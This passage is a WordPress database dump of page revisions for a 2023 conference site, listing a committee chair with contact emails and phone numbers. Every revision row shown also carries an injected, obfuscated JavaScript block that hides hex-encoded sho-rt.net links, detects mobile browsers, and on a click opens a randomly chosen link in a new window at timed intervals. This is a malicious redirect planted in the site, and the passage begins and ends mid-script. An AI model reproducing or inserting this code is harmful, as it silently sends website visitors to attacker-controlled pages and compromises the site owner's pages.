_0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','dt-the7','','inherit','closed','closed','','4823-revision-v1','','','2023-06-27 09:03:54','2023-06-27 09:03:54','',4823,'https://gsw2023.com/?p=4879',0,'revision','',0),
(4880,4,'2023-06-27 09:04:20','2023-06-27 09:04:20','[vc_row][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1687856532478{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Chair</strong></span></p>\r\n[/vc_column_text][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"full-width\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]\r\n\r\n<span style=\"font-size: 12pt;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span>\r\nVice President for Post Graduate and Scientific Research\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table style=\"margin: 0px; padding: 0px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\r\n<td style=\"width: 26%;\">aaelbary@aast.edu</td>\r\n<td style=\"width: 26%;\">aaelbary@gsw2023.com</td>\r\n<td style=\"width: 26%;\">gsw2023@aast.edu</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\r\n<td style=\"width: 26%;\">Office: +203 5497598</td>\r\n<td style=\"width: 26%;\">Fax: +203 5497598</td>\r\n<td style=\"width: 26%;\">Mobile: +20 100 7382 198</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-27 09:04:20','2023-06-27 09:04:20','',4849,'https://gsw2023.com/?p=4880',0,'revision','',0),
(4881,4,'2023-06-27 09:05:18','2023-06-27 09:05:18','[vc_row][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1687856703448{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Chair</strong></span></p>\r\n[/vc_column_text][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"full-width\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span>\r\nVice President for Post Graduate and Scientific Research\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table style=\"margin: 0px; padding: 0px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\r\n<td style=\"width: 26%;\">aaelbary@aast.edu</td>\r\n<td style=\"width: 26%;\">aaelbary@gsw2023.com</td>\r\n<td style=\"width: 26%;\">gsw2023@aast.edu</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\r\n<td style=\"width: 26%;\">Office: +203 5497598</td>\r\n<td style=\"width: 26%;\">Fax: +203 5497598</td>\r\n<td style=\"width: 26%;\">Mobile: +20 100 7382 198</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s 